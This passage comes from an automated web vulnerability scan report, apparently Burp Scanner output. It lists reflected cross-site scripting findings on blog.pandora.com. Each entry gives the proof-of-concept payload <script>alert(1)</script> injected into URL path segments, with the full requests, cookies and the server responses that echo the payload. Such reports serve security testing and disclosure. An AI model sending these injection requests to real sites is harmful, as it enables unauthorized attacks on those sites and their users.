Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p>
...[SNIP]...

3.181. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p>
...[SNIP]...

3.182. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p>
...[SNIP]...

3.183. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p>
...[SNIP]...

3.184. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p>
...[SNIP]...

3.185. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p>
...[SNIP]...

3.186. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p>
...[SNIP]...

3.187. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p>
...[SNIP]...

3.188. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p>
...[SNIP]...

3.189. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p>
...[SNIP]...

3.190. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p>
...[SNIP]...

3.191. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p>
...[SNIP]...

3.192. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p>
...[SNIP]...

3.193. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p>
...[SNIP]...

3.194. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p>
...[SNIP]...

3.195. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p>
...[SNIP]...

3.196. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p>
...[SNIP]...

3.197. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
